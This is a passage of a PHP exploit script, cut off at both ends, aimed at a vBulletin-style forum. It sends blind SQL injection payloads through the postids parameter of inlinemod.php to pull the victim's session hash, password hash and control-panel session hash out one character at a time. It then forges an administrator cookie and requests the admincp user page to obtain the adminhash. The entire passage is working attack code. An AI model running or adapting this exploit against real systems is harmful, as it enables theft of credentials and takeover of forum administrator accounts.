&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\"
\",$temp[1]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0];

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$my_uid.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\"
Exploit&nbsp;failed...\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
$j++;
}
$my_uid=intval($my_uid);

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57));&nbsp;//numbers
$chars=array_merge($chars,range(97,102));//a-f&nbsp;letters
$j=1;$sess_hash=\"\";
echo&nbsp;\"
session&nbsp;hash&nbsp;->&nbsp;\";
while&nbsp;(!strstr($sess_hash,chr(0)))
{
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\"
unknown&nbsp;query&nbsp;error...\");}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\"
\",$temp[1]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0];

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;it
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$sess_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\"
Exploit&nbsp;failed...\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
$j++;
}

$j=1;$my_hash=\"\";
echo&nbsp;\"
user&nbsp;password&nbsp;hash&nbsp;->&nbsp;\";
while&nbsp;(!strstr($my_hash,chr(0)))
{
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\"
unknown&nbsp;query&nbsp;error...\");}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\"
\",$temp[1]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0];

		&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$my_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\"
Exploit&nbsp;failed...\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
$j++;
}

$j=1;$cpsess_hash=\"\";
echo&nbsp;\"
cp&nbsp;session&nbsp;hash&nbsp;->&nbsp;\";
while&nbsp;(!strstr($cpsess_hash,chr(0)))
{
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=255;&nbsp;$i++)
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(in_array($i,$chars))
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data&nbsp;=\"s=\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&do=docopyposts\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&destforumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&title=suntzu\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&forumid=$forumid\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"POST&nbsp;\".$p.\"inlinemod.php?f=$forumid&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=$data;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp=explode(\"showthread.php?t=\",$html);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$temp2=explode(\"
\",$temp[1]);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$thread=(int)$temp2[0];

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;=\"GET&nbsp;\".$p.\"showthread.php?t=$thread&nbsp;HTTP/1.0
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Accept-Language:&nbsp;en
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Host:&nbsp;\".$host.\"
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Pragma:&nbsp;no-cache
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Cookie:&nbsp;\".$cookie.\";&nbsp;
\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet.=\"Connection:&nbsp;Close

\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sendpacketii($packet);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"You&nbsp;have&nbsp;an&nbsp;error&nbsp;in&nbsp;your&nbsp;SQL&nbsp;syntax\",$html)){echo&nbsp;$html;&nbsp;die(\"
unknown&nbsp;query&nbsp;error...\");}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(eregi(\"join&nbsp;date\",$html))&nbsp;{$cpsess_hash.=chr($i);echo&nbsp;chr($i);&nbsp;sleep(1);&nbsp;break;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($i==255)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(\"
Exploit&nbsp;failed...\");
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;}
$j++;
}
echo&nbsp;\"
\";

$packet&nbsp;=\"GET&nbsp;\".$p.\"admincp/user.php?do=edit&u=$my_uid&nbsp;HTTP/1.0
\";
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"profile.php
\";
$packet.=\"Accept-Language:&nbsp;en
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;7.0;&nbsp;Windows&nbsp;NT&nbsp;5.1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Pragma:&nbsp;no-cache
\";
$packet.=\"Cookie:&nbsp;\".$cookie_prefix.\"lastactivity=0;&nbsp;\".$cookie_prefix.\"password=\".md5(trim($my_hash)).\";&nbsp;bbuserid=\".$uid.\";&nbsp;\".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\";&nbsp;\".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\";
\";
$packet.=\"Connection:&nbsp;Close

\";
sendpacketii($packet);
$temp=explode(\"adminhash\"&nbsp;value=\"\",$html);
$temp2=explode(\"\"\",$temp[1]);
$adminhash=$temp2[0];
echo&nbsp;\"adminhash&nbsp;->\".$adminhash.\"
\";
if&nbsp;($adminhash<>\"\")&nbsp;{echo&nbsp;\"
